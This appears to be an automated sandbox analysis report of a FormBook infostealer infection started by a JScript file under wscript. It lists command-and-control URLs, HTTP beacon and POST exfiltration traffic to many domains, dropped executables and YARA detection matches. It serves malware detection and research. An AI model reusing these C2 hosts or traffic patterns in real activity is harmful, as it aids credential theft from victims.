Source: wscript.exe, 0000000A.00000002.807977026.00000216DE0B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.833368380.0000013D917F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrer
Source: wscript.exe, 00000001.00000002.837519224.000001922CEA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.808195636.00000216DFFE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.812768538.0000013D91390000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.812147532.000001D1951F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vres2
Source: wscript.exe, 00000001.00000003.723658631.000001922CD55000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.723636243.000001922CD45000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VretBgsX
Source: wscript.exe, 0000000D.00000002.833368380.0000013D917F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrew
Source: wscript.exe, 0000000A.00000002.831511243.00000216E07E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.833368380.0000013D917F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrex
Source: wscript.exe, 0000000F.00000002.805316166.000001D193220000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrex4
Source: wscript.exe, 00000001.00000002.837475499.000001922CD9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrez
Source: wscript.exe, 0000000D.00000002.812596470.0000013D8F474000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre~42e
Source: wscript.exe, 00000001.00000002.830621211.000001922CCE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.723818246.000001922CD31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: wscript.exe, 0000000A.00000002.815966178.00000216E0780000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.759788856.00000216E0787000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.607995177.00000216E0787000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.comZZZZ0
Source: wscript.exe, 0000000F.00000002.813389794.000001D1957CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.comZZZZPl
Source: wscript.exe, 0000000D.00000003.789395297.0000013D917AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.631492043.0000013D917AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.818642353.0000013D917AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.632191346.0000013D917AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.comu
Source: unknown HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.losangelesrentalz.comConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.losangelesrentalz.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.losangelesrentalz.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 34 38 68 3d 7a 4a 63 61 43 47 62 6c 68 68 35 74 66 6c 78 4d 32 61 6a 63 4c 58 77 50 6e 6d 7e 53 68 5a 4c 48 61 4c 4e 48 63 72 64 51 36 30 59 2d 6a 32 61 76 6a 32 65 4e 6c 33 43 39 56 54 6a 65 65 58 61 4b 32 4f 78 6b 28 5a 7e 32 6d 68 36 6d 55 6d 52 70 43 79 76 78 71 36 69 72 56 69 4e 57 4b 69 36 38 4f 4a 44 45 6c 53 71 67 28 58 37 50 71 54 35 5f 62 64 44 4c 6a 61 46 6b 50 49 35 33 37 4f 52 54 57 4b 53 6a 72 4f 4a 37 71 70 56 43 61 6d 52 39 77 66 62 58 6c 43 69 65 54 2d 50 6f 65 43 71 66 7a 57 35 4c 39 30 69 76 65 73 7a 44 43 78 64 47 59 64 4a 32 50 57 42 47 70 5a 4e 66 6e 55 32 33 61 76 65 46 6a 7a 42 50 48 30 78 66 47 34 53 7a 56 32 52 79 72 66 6d 43 31 37 68 6f 6d 36 4a 49 59 64 31 33 42 4d 33 49 78 77 45 41 58 70 48 57 67 50 74 6c 77 65 75 42 70 4f 4e 6d 38 62 5a 6c 58 52 79 45 71 64 54 46 49 52 65 35 67 4c 58 73 50 33 39 52 73 49 6a 44 74 4a 68 48 4c 50 48 55 28 52 68 4d 55 75 59 72 35 67 6d 74 6f 44 48 7a 51 43 50 52 4b 55 36 35 4d 56 67 4a 75 63 6b 6c 4d 6c 54 6b 64 66 37 4a 6c 45 62 52 6a 78 44 6f 7e 56 35 70 77 43 45 34 64 38 32 4c 50 6d 37 63 72 34 4a 69 47 57 78 56 6b 46 37 46 41 5f 53 54 28 55 28 50 36 78 4d 54 73 35 43 4a 49 75 58 33 67 4d 73 71 70 56 41 4a 31 42 72 76 30 34 7e 4d 41 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: U48h=zJcaCGblhh5tflxM2ajcLXwPnm~ShZLHaLNHcrdQ60Y-j2avj2eNl3C9VTjeeXaK2Oxk(Z~2mh6mUmRpCyvxq6irViNWKi68OJDElSqg(X7PqT5_bdDLjaFkPI537ORTWKSjrOJ7qpVCamR9wfbXlCieT-PoeCqfzW5L90iveszDCxdGYdJ2PWBGpZNfnU23aveFjzBPH0xfG4SzV2RyrfmC17hom6JIYd13BM3IxwEAXpHWgPtlweuBpONm8bZlXRyEqdTFIRe5gLXsP39RsIjDtJhHLPHU(RhMUuYr5gmtoDHzQCPRKU65MVgJucklMlTkdf7JlEbRjxDo~V5pwCE4d82LPm7cr4JiGWxVkF7FA_ST(U(P6xMTs5CJIuX3gMsqpVAJ1Brv04~MAw).
Source: unknown DNS traffic detected: queries for: dilshadkhan.duia.ro
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=d/nstEfJj6EqHIao63FJ0s9GuqA95KQHoqtaktjr9/p2jHwlkCQ3yhCEo2yEkzAcnCwi&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.jlbwaterdamagerepairseattle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=E3oeYQ/4MqgKR0uZQviaDeSIZFjg9uLLieRcSmG+YXW0WXU/K8viVoPbPV+txMCieWz0&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.nachuejooj07.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=1Nsioc0lpQImfCEv7q3CJRvbkNIovvFEONaUY8zyneWF7ypKO8GgemnIz8ljrbRyzkwj&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.xn--wsthof-camping-gsb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=N6XRxtM6F1nBVZRwu48YOgJ13F0eVAmeAwT+lah6Tiq2+v96MM9EXT3L0sCJR4qYezv9&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.brandingaloha.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=SjFSW0qH8X1Gu/+4r88YNPSLQa2KKx1h4LPt291Cc0nRXdmgbio7b0swgPTE4uOj94VU&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.brawlhallacodestore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=vlrq3Iq6CNBS64Mt3AOFKZFqCoQQX/EcbdCgZyJL/t2S6EN96XJkdyy29bgYyDpdikhs&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.kishanshree.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=VAwngi5WtAVjDckXiPDKxPPVGnJBDj1vDFh4gmlmfJouKpIa6u8IzCyY+5EvW03qMChn&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.littlebeartreeservices.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=VOk/KoOKPmyFTHQXWsNAO627WiKHMN6hKQrMVwJFQe1euvxAvAuscpxAvLs3P2LowQm4&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.sekolahkejepang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=0fJNa1pbsGGBLLIqJIKrQqKQ2B2XPA1kKZrGWkGMUEET6sTbN1/jKODkGFdHTU1h4cme&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.68chengxinle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEPodkGcNW4yt&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.topings33.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=8LogcizAnzdlGnQxjqmkKg1ptkiP35PZAMc6f9pH/hY/tlO3rV33gx6kBCmuDEKP6O8z&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.losangelesrentalz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=25I4eedf3LYXj+mrZ2jI6olVDZbg0jTgzRvorLdGhmBPpJDDPx12pMPLDebssumACK1+&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.shcylzc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?2dEPbf=4hfxZPP84Ri&U48h=vppS5AedQQffRlEeclZ7feN7VEirdPdpHk1lk+jbM2J+jzoAXquLk4CVs2mn5+uwvQPb HTTP/1.1Host: www.medyumgalip.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=Zh0bV6ZfyWWsx8NH2/NEuPodWNfo5oM06Wd1YTR0VEh7Ou4O0zYflewlPsoSmCQ+q/UO&2dEPbf=4hfxZPP84Ri HTTP/1.1Host: www.udrivestorage.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?2dEPbf=4hfxZPP84Ri&U48h=ki1nHMJkMrR7eeT2cjvvxShsxzdLToZEWe0Y/Ruw5T1OY282Gl8t0P/h1biOuIyNKIHU HTTP/1.1Host: www.lazarusnatura.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?2dEPbf=4hfxZPP84Ri&U48h=Gfubwqqm8fAzC8DVdPlLHb5iW2l0adCKSAamgQxpd8VH998tJyiM6MNptdcvbuHHsRLz HTTP/1.1Host: www.salondutaxi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=O5u6OlqxnDtTF3riQ4xVZIWxoHxK/fTzbXBC76K0hST926FmxCw4JGrgecy53rLpUaVG&2dEPbf=4hfxZPP84Ri HTTP/1.1Host: www.interlink-travel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?2dEPbf=4hfxZPP84Ri&U48h=vlrq3Iq6CNBS64Mt3AOFKZFqCoQQX/EcbdCgZyJL/t2S6EN96XJkdyy29bgYyDpdikhs HTTP/1.1Host: www.kishanshree.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=vlrq3Iq6CNBS64Mt3AOFKZFqCoQQX/EcbdCgZyJL/t2S6EN96XJkdyy29bgYyDpdikhs&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.kishanshree.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=VAwngi5WtAVjDckXiPDKxPPVGnJBDj1vDFh4gmlmfJouKpIa6u8IzCyY+5EvW03qMChn&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.littlebeartreeservices.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=VOk/KoOKPmyFTHQXWsNAO627WiKHMN6hKQrMVwJFQe1euvxAvAuscpxAvLs3P2LowQm4&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.sekolahkejepang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=0fJNa1pbsGGBLLIqJIKrQqKQ2B2XPA1kKZrGWkGMUEET6sTbN1/jKODkGFdHTU1h4cme&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.68chengxinle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEPodkGcNW4yt&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.topings33.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=8LogcizAnzdlGnQxjqmkKg1ptkiP35PZAMc6f9pH/hY/tlO3rV33gx6kBCmuDEKP6O8z&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.losangelesrentalz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=25I4eedf3LYXj+mrZ2jI6olVDZbg0jTgzRvorLdGhmBPpJDDPx12pMPLDebssumACK1+&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.shcylzc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 2.2.bin.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.bin.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.292250245.0000024969786000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.372823411.0000000005604000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.830373431.0000000000E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.401722166.00000000014D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.830259140.0000000000B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.308018485.0000024969E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.299860714.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.300915140.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.801300107.0000000000910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.291613938.00000000013A1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.401531356.00000000013A1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.401874829.0000000001840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.300404894.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.344226970.0000000005604000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.302134868.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.292414870.0000024969A7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.295432260.00000249697F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.300557956.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.805718233.00000000009A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Lipg\msdxp.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 2.2.bin.exe.13a0000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.bin.exe.13a0000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.bin.exe.13a0000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.bin.exe.13a0000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.292250245.0000024969786000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.292250245.0000024969786000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.372823411.0000000005604000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.372823411.0000000005604000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.830373431.0000000000E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.830373431.0000000000E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.401722166.00000000014D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.401722166.00000000014D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.830259140.0000000000B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.830259140.0000000000B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.308018485.0000024969E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.308018485.0000024969E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.299860714.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.299860714.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.300915140.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.300915140.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.801300107.0000000000910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.801300107.0000000000910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.291613938.00000000013A1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.291613938.00000000013A1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.401531356.00000000013A1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.401531356.00000000013A1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.401874829.0000000001840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.401874829.0000000001840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.300404894.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.300404894.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.344226970.0000000005604000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.344226970.0000000005604000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.302134868.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.302134868.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.292414870.0000024969A7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.292414870.0000024969A7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.295432260.00000249697F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.295432260.00000249697F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.300557956.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.300557956.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.805718233.00000000009A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.805718233.00000000009A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\Lipg\msdxp.exe, type: DROPPED Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: C:\Users\user\AppData\Local\Temp\Lipg\msdxp.exe, type: DROPPED Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Wscript called in batch mode (surpress errors)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\ORYNeBzyRj.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\ORYNeBzyRj.js Jump to behavior
Yara signature match
Source: 2.2.bin.exe.13a0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.bin.exe.13a0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.bin.exe.13a0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.bin.exe.13a0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.300627425.00000249697C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.292250245.0000024969786000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.292250245.0000024969786000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.292250245.0000024969786000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.372823411.0000000005604000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.372823411.0000000005604000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
